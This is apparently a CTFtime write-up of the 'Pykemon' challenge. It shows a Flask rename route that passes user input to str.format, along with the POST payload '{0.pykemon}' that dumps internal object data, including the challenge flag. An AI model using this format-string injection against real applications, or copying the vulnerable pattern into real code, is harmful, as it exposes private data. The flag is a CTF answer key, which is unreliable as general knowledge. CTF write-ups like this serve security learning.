CTFtime.org

Pykemon

by _s_n_t / NeverTry

Rating:

As I'm an idiot I didn't realise you could just decode the session, but it did mean I learnt about a nice little way to exploit format string bugs in python :)

run.py had:

```
@app.route('/rename/', methods=['POST'])
def rename():
name = request.form['name']
new_name = request.form['new_name']
...
p = check(name, 'caught')
if not p:
return "Error: trying to name a pykemon you haven't caught!"
...
for pykemon in s['pykemon']:
if pykemon['pid'] == name:
..
return "Successfully renamed to:\n" + new_name.format(p)
```

so we could control an arbitrary formatstring called with a "pykemon" object, this article: http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/ lead to a way to get the flag:

```
POST /rename/ HTTP/1.1
...

name=Pyduck67&new_name={0.pykemon}
```

```
Successfully renamed to:
[[100, 'Pydiot', 'Pydiot', 'images/pydiot.png', 'Pydiot is an avian Pykamon with large wings, sharp talons, and a short, hooked beak'], [90, 'Pytata', 'Pytata', 'images/pytata.png', 'Pytata is cautious in the extreme. Even while it is asleep, it constantly listens by moving its ears around.'], [80, 'Pyliwag', 'Pyliwag', 'images/pyliwag.png', 'Pyliwag resembles a blue, spherical tadpole. It has large eyes and pink lips.'], [70, 'Pyrasect', 'Pyrasect', 'images/pyrasect.png', 'Pyrasect is known to infest large trees en masse and drain nutrients from the lower trunk and roots.'], [60, 'Pyduck', 'Pyduck', 'images/pyduck.png', 'Pyduck is a yellow Pykamon that resembles a duck or bipedal platypus'], [50, 'Pygglipuff', 'Pygglipuff', 'images/pygglipuff.png', 'When this Pykamon sings, it never pauses to breathe.'], [40, 'Pykachu', 'Pykachu', 'images/pykachu.png', 'This Pykamon has electricity-storing pouches on its cheeks. These appear to become electrically charged during the night while Pykachu sleeps.'], [30, 'Pyrigon', 'Pyrigon', 'images/pyrigon.png', 'Pyrigon is capable of reverting itself entirely back to program data and entering cyberspace.'], [20, 'Pyrodactyl', 'Pyrodactyl', 'images/pyrodactyl.png', 'Pyrodactyl is a Pykamon from the age of dinosaurs'], [10, 'Pytwo', 'Pytwo', 'images/pytwo.png', 'Pytwo is a Pykamon created by genetic manipulation'], [0, 'FLAG', 'FLAG', 'images/flag.png', 'PCTF{N0t_4_sh1ny_M4g1k4rp}']]
```

_s_n_t

Comments